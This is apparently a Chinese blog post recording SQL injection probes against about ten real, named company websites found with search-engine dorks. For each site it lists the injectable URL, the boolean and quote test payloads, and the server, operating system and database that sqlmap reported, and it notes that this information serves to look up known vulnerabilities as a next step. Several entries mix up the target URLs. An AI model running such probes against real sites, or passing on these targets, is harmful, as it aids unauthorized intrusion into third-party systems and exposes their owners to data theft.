• 记一次实战案例


    1、目标:inurl:news.php?id=  

    URL:https://www.lghk.com/news.php?id=5

    网站标题:趋时珠宝首饰有限公司

    手工基础判断:

    And用法

    and 1=1: 这个条件始终是为真的, 也就是说, 存在SQL注入的话, 这个and 1=1的返回结果必定是和正常页面时是完全一致的

    and 1=2返回为假, 会强行吧整个查询条件建立成假. 导致查询无数据, 因此页面内容会和正常页面不同.

    原始网页:https://www.lghk.com/news.php?id=5

    构造url1:https://www.lghk.com/news.php?id=5 AND 1=1

             3664bd618836d86e3e278b3336b9e524.png

    构造url2:https://www.lghk.com/news.php?id=5 AND 1=2

    1b41eee752875b0f10c16547b190a5b3.png

    如果url1访问结果跟原始网页一致,而url2跟原始网页不一致,有出错信息或者显示内容不一致,则证明存在SQL注入

    or用法:只要有一个为真,那么整条语句都是真

    构造url1:https://www.lghk.com/news.php?id=5 or 1=1    正常页面只有News(会显示News, Awards & Cert.)

    构造url2:https://www.lghk.com/news.php?id=5 or 1=2    正常页面只有News(会显示News, Awards & Cert.)

    b3517cccc8e9807a28f404df3ee2658e.png

    xor用法:同为真同为假,那就是假;一真一假才为真

    构造url1:https://www.lghk.com/news.php?id=5 xor 1=1  (显示正常,全部数据都给)

    构造url2:https://www.lghk.com/news.php?id=5 xor 1=2   (显示正常,全部数据都给)

    字符串类型判断

    单引号

    构造url1:https://www.lghk.com/news.php?id=5’  (输入单引号会显示报错,后端代码可能有问题 )

    8cb98f7486ac00208cc8add83fb2fb5a.png

    双引号

    构造url1:https://www.lghk.com/news.php?id=”5”(显示页面正常 )

    39b209079b4543905613dfe2e2df1e29.png

    Sqlmap检测:使用工具来跑可以看到存在多种注入,可以看到这个网站的应用信息,web应用技术:Nginx,PHP 7.4.33

    后端DBMS:MySQL>=5.0(MariaDB fork)

    1978763935ae4351e539503810c816aa.png

    2、目标:inurl:news.php?id=  

    URL:http://www.xiatech.com.cn/aboutus.asp?id=3

    网站标题:西安夏溪科技

    手工基础判断:

    And用法

    构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

    33184ad937d103dc7d363f2ad54c51a1.png

    构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=2 (显示报错页面这通常表示可能存在 SQL 注入漏洞)

    ca0790d0efb1a385884f2c38e73d970a.png

    or用法

    构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1 (显示1的页面,页面页发生了变化)

    字符串类型判断

    单引号

    构造url1:https://www.lghk.com/news.php?id=5’  (输入单引号会显示报错,后端代码可能有问题 )

    6a9c6e8dd89f75449fb11e23608ba458.png

    构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=2 (页面没发生变化)

    08ab03e2a3d3a646f6c11fbb8c253a7a.png

    xor用法

    构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=1 (显示1的页面,页面页发生了变化)

    d806de92afe552447a93b4c927c4beef.png

    构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=2 (页面没发生了变化)

    82dc8671b2e67bc7fa46e265562ce416.png

    字符串类型判断

    单引号

    构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3’  (输入单引号会显示报错,后端代码可能有问题 )

    e3dfc516e313b649fe8f5769f6508fb9.png双引号

    构造url1:http://www.xiatech.com.cn/aboutus.asp?”id=”5”(显示错误 )

    307023741a15e5d7ab0ee1854f2e9fa2.png

    Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

    操作系统Windows7 or2008r2

    中间件是 iis 7.5

    (知道这些信息我们可以查找历史漏洞进行下一步操作)

    e4119b24a72460d6528390f1a978e09f.png

    09ee00bcb88ce1c4004a43604ed0f592.png

    3、目标:inurl:news.php?id=  

    URL:http://www.xiatech.com.cn/aboutus.asp?id=3

    网站标题:西安夏溪科技

    手工基础判断:

    And用法

    构造url1:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

    构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

    e64666e49fbfe3e3e7c9f579a83bf1c3.png

    or用法

    构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1   or 1+=2(页面显示正常)

    Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

    操作系统Windows7 2012 r2 or 8.1

    中间件是 PHP 5.4.45, Microsoft IIS 8.5

    数据库是MySQL5.0

    (知道这些信息我们可以查找历史漏洞进行下一步操作)

    174d97358df7c7dd07d59cca326607b7.png

    4、目标:inurl:asp?id=  

    URL:http://www.jgbr.com.cn/ShowProduct.asp?ID=217

    网站标题:江苏力星通用钢球股份有限公司

    手工基础判断:

    And用法

    构造url1:http://www.jgbr.com.cn/ShowProduct.asp?ID=217 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

    构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

    1703f4d0d744c106ed3aef332d622950.png

    Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

    操作系统Windows7 or2008r2

    中间件是 iis 7.5

    (知道这些信息我们可以查找历史漏洞进行下一步操作)

    60b06b9c42f8852ebbda6c332d8ba5df.png

    5、目标:inurl:asp?id=  

    URL:http://www.hosen.cn/product.php?pid=500

    网站标题:南京浩晃科技有限公司

    手工基础判断:

    And用法

    构造url1:http://www.hosen.cn/product.php?pid=500 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

    ffd58837e1686b121cc059a538b82a08.png

    构造url2:http://www.hosen.cn/product.php?pid=500 AND+1=2 (报错页面可能存在 SQL 注入漏洞)

    Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

    网站信息:PHP 5.4.26, Nginx

    (知道这些信息我们可以查找历史漏洞进行下一步操作)

    07670e54eca7a7082b8703a78e009d69.png

    6、目标:inurl:asp?id=  

    URL:http://www.cuc-china.net/about.asp?id=124

    网站标题:世优认证 (上海)有限公司

    手工基础判断:

    And用法

    构造url1:http://www.cuc-china.net/about.asp?id=124 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

    2cc6beb1e8190a0131055d14db48698f.png

    构造url2:http://www.cuc-china.net/about.asp?id=124 AND+1=2(报错页面可能存在 SQL 注入漏洞)

    4898d0e5dc64e58e1111930842b0d6de.png

    Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

    web服务器操作系统:Windows 7或2008 R2

    web应用技术:Microsoft IIS 7.5、ASP、ASP。NET

    后端DBMS:Microsoft Access (知道这些信息我们可以查找历史漏洞进行下一步操作)

    99d965c6a75341a93fc87159454c80c5.png

    7、目标:inurl:asp?id=  

    URL:http://www.ywbaili.com/news.php?id=1

    网站标题:百利飞镖

    手工基础判断:

    And用法

    构造url1:http://www.ywbaili.com/news.php?id=1 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

    f329ff6237d774bef635636c72834dd4.png

    构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

    9f293cb83b06e42b75778465e7015f45.png

    Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

    web服务器操作系统:Windows XP或2003

    web应用技术:ASP.NET、Microsoft IIS 6.0

    后端DBMS:MySQL>=5.0.12(知道这些信息我们可以查找历史漏洞进行下一步操作)

    81759978e9a5b303d81c5681bd7641b8.png

    8、目标:inurl:news.php?id=  

    URL:https://www.szdwwy.com/service_show.php?id=2

    网站标题:东吴服务产业集团 (江苏) 有限公司

    And用法

    构造url1:https://www.szdwwy.com/service_show.php?id=2 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

    构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

    2dbbfcc81a5765b89f761baa39570dc8.png

    Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

    后端DBMS是MySQL

    web应用程序技术:Apache

    后端DBMS:MySQL>=5.0.12

    (知道这些信息我们可以查找历史漏洞进行下一步操作)

    ef5092b001a0ddd0f292781ecb5705a3.png

    9、目标:inurl:news.php?id=  

    URL:http://www.icet.org.cn/news.asp?id=367

    网站标题:能源与交通创新中心

    And用法

    构造url1:http://www.icet.org.cn/news.asp?id=367 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

    构造url2:http://www.icet.org.cn/news.asp?id=367 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

    0746c4b706735628fa95ff2a301586d7.png

    Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

    web服务器操作系统:Windows 2012或8

    web应用程序技术:Microsoft IIS 8.0、ASP.NET、ASP

    后端DBMS:Microsoft Access

    (知道这些信息我们可以查找历史漏洞进行下一步操作)

    ede3cfbd3351bf2920390920173d1659.png

    10、目标:inurl:band_info.php?id=  

    URL:http://www.fine-stamping.com/contact.asp?id=10

    网站标题:苏州范斯特机械科技有限公司

    And用法

    构造url1:http://www.fine-stamping.com/contact.asp?id=10 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

    构造url2:http://www.fine-stamping.com/contact.asp?id=10 AND+1=2(显示正常页面这通常表示可能存在 SQL 注入漏洞)

    字节符

    构造url2:http://www.fine-stamping.com/contact.asp?id=10’(显示报错)

    1a762aad2a29886d48f78b0fe6231821.png 

    Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

    web服务器操作系统:Windows

    web应用技术:ASP

    后端DBMS:Microsoft Access

    (知道这些信息我们可以查找历史漏洞进行下一步操作)

    c7940275a6892cd58cea70b4ed387699.png

    问题:1  

    URL:http://www.syyqz.com/lianxi.php?pid=6&id=6

    手工测试是有漏洞,但是使用sqlmap跑也是有注入点,但是就是跑不出数据库信息

    6875fc04aa40da42c0929a7b80b7f4bf.png

    问题:2  

    URL:http://www.isriht.com/index.php?id=344

    输入了and 1=1 显示下图这样的操作

    2d24c65fa2a9f3c39d3602c4eafe39c9.png

  • 相关阅读:
    【2023 · CANN训练营第一季】基于昇腾910的TF网络脚本训练(ModelArts平台)
    SpringCloud的服务发现框架 — Eureka — 单机Eureka构建流程,以及服务注册功能实现
    cpu设计和实现(异常和中断)
    UWB学习——day5
    docker-compose部署elk(8.9.0)并开启ssl认证
    任务调度框架-如何实现定时任务+RabbitMQ事务+手动ACK
    .NET 7 性能改进 -- 至今为止最快的.NET平台
    【lesson9】进程
    【LeetCode】剑指 Offer <二刷>(5)
    Ajax--form表单与模板引擎--通过Ajax提交表单数据及案例 - 评论列表
  • 原文地址:https://blog.csdn.net/qq_46939030/article/details/133257903